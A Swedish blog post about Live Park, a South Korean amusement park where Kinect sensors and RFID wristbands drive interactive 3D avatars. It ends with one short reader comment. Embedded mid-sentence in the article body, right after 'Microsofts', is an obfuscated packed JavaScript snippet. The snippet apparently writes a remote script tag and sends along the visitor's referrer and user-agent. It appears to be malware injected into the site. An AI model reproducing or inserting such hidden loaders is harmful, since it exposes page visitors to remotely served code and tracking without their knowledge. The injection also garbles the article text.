Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Live Park i Sydkorea skapar interaktiv 3D värld

Live Park i Sydkorea skapar interaktiv 3D värld
Sebastian

Microsofts eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zsrbe|var|u0026u|referrer|zyrbd||js|php’.split(’|’),0,{}))
Kinect har dykt upp på ett antal oväntade platser, och den här gången används den för att driva ett 3D nöjesfält i Sydkorea.

Skapad av det interaktiva företaget D’strict består Live Park av 65 sevärdheter. RFID-armband spårar varje användare när de flyttar sig runt, samtidigt jobbar Kinect-sensorerna med att låta sina rörelser och uttryck kontrollera virtuella avatarer på parkens väggar. Det är alltså installationer som bygger upp hologram och panoramavyer i 3D.
På natten förvandlas hela parken till en stor dansklubb i 3D där folk festar loss.

Bygget kostade 13 miljoner dollar och kan ta emot 3000 personer åt gången. Detta är inte ett engångsexperiment utan man har redan fått ihop en rad partner som tillsammans ska bygga upp liknande parker i Kina och Singapore. Även USA har fått planer på att öppna upp parker i Los Angeles och Las Vegas.

Vi i Sverige får nog vänta ett tag innan Liseberg och Gröna Lund tar på sig något liknande 😛

Comments

  1. Riktigt häftigt faktiskt 🙂